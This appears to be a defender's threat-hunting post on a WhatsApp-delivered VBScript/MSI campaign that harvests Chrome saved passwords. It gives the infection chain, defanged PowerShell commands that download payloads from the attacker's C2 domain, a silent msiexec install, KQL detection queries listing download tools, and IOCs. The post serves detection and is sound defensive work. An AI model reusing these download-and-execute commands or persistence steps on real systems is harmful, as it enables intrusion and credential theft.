Puneet Jena

WhatsApp malware campaign targeting Chrome credential vaults

While hunting for malicious PowerShell techniques, we identified anomalous behavior indicative of staged payload execution.

Initial Access & Delivery Chain Summary

  • Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
  • Execution of the VBScript initiated a multi-stage payload delivery mechanism, which:
      ◦ Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
      ◦ Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
      ◦ Created persistence by adding the installer script to the Run registry key.
      ◦ Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
      ◦ Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords because of the established persistence.

Observed Malicious Execution Activity

WScript Executions

  • "wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
  • "WScript.exe" C:\Users*\AppData\Local\Temp**.zip.0e6*.vbs
  • "wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

Msiexec Execution

  • "msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

Detection query: PowerShell download activity spawned by wscript.exe

  • Both queries below will return false positives (legitimate scripts that call PowerShell to fetch content); these must be eliminated through validation and filtering before the results are acted on.

DeviceProcessEvents
| where InitiatingProcessFileName contains "wscript"
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget", "iex", "iwr")
| distinct ProcessCommandLine, InitiatingProcessCommandLine

.vbs & .msi Execution Identification:

union isfuzzy=true DeviceProcessEvents
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget", "iex", "iwr")
| project DeviceName, T1 = Timestamp, ProcessCommandLine, InitiatingProcessCommandLine
| join kind=inner (
    DeviceProcessEvents
    | where ProcessCommandLine contains "wscript" or ProcessCommandLine contains "msiexec"
    | where ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs"
    | project DeviceName, T2 = Timestamp, ProcessCommandLine1 = ProcessCommandLine, InitiatingProcessCommandLine1 = InitiatingProcessCommandLine
) on DeviceName
// keep only download/script pairs that occurred on the same device within the same minute
| extend timedifference = abs(datetime_diff('minute', T1, T2))
| where timedifference < 1

Reference:

IOCs

  • 36805f82166acf711007ab42e0e4147c10c7639fbf94eac9a1d26401e91a26ea
  • 8041b6cdeb3a4502066d18d024e671577dda23d4a1e4d083f34fcbfa39469279
  • varegjopeaks[.]com/altor/teste_obscado[.]vbs
  • varegjopeaks[.]com/altor/baixa_sscado[.]vbs
  • varegjopeaks[.]com
